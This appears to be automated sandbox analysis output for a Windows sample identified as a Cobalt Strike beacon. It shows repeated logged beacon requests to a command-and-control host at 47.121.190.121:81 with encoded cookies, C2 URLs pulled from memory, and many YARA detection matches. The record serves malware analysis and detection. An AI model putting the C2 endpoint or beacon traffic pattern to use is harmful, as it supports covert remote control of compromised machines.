Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dot.gif HTTP/1.1Accept: /Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w=User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)Host: 47.121.190.121:81Connection: Keep-AliveCache-Control: no-cache

Source: THsSNYblMw.exe, 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.121.190.121:81/aGDq
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.121.190.121:81/aGDq2YZm
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2571536048.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000002.4147628673.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2615602847.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.3555909951.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2725970997.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2659449873.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2593148882.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2714841949.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2560930300.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2637117204.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, THsSNYblMw.exe, 00000000.00000003.2671163654.00000000007CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.121.190.121:81/dot.gif
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.121.190.121:81/dot.gif.121:81/dot.gifKT
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000792000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.121.190.121:81/dot.gif7Y
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.121.190.121:81/dot.gift
Source: THsSNYblMw.exe, 00000000.00000002.4147628673.0000000000789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.121.190.121:81/dot.gifv

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: THsSNYblMw.exe PID: 6864, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\THsSNYblMw.exe

Code function: 0_2_006D0078 CreateProcessWithLogonW,

0_2_006D0078

Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006BE0E8	0_2_006BE0E8
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006CD0C0	0_2_006CD0C0
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006CB140	0_2_006CB140
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B61C0	0_2_006B61C0
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006CA270	0_2_006CA270
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B0240	0_2_006B0240
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006CBAB0	0_2_006CBAB0
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006AA280	0_2_006AA280
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006C03DC	0_2_006C03DC
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006C43D4	0_2_006C43D4
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006B6CB0	0_2_006B6CB0
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006A9D6C	0_2_006A9D6C
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006C9570	0_2_006C9570
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006BFD18	0_2_006BFD18
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006CAE57	0_2_006CAE57
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006BEEB4	0_2_006BEEB4
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006C0E90	0_2_006C0E90
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_006AD784	0_2_006AD784
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_0351CBCB	0_2_0351CBCB
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_035302D7	0_2_035302D7
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_0352F15F	0_2_0352F15F
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_0352F823	0_2_0352F823
Source: C:\Users\user\Desktop\THsSNYblMw.exe	Code function: 0_2_0352D52F	0_2_0352D52F

Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.THsSNYblMw.exe.6a0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.THsSNYblMw.exe.6a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
